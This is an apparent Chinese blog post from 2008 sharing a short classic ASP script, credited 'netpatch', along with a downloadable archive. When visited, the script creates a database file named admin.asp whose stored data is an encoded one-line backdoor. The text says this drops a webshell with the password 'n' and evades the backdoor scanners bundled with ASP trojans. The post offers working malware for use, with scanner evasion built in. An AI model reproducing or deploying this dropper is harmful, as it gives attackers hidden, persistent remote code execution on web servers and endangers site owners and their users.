by 清泉
19. 八月 2008 11:22
<%
'code by netpatch
dim dbfile,sql
db="admin.asp"
dbfile=server.mappath(db)
set ydb=server.createobject("adox.catalog")
ydb.create "provider=microsoft.jet.oledb.4.0;data source=" & dbfile
set ydb=nothing
if err.number=0 then
response.write dbfile & " 创建成功<br> "
else
response.write "创建失败,原因: " & err.description
response.end
end if
set conn = server.createobject("adodb.connection")
conn.open "provider=microsoft.jet.oledb.4.0; data source=" & dbfile
sql="create table fdata([data] memo)"
conn.execute(sql)
set rs = createobject("adodb.recordset")
rs.open "fdata", conn, 1, 3
rs.addnew
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"
rs.update
%>
可以躲过ASP木马自带的后门扫描器,被访问则在同目录释放出密码为"n"的一句话后门。
ASP入侵代码写的写不错的小马一般工具查不出来.rar (545.00 bytes)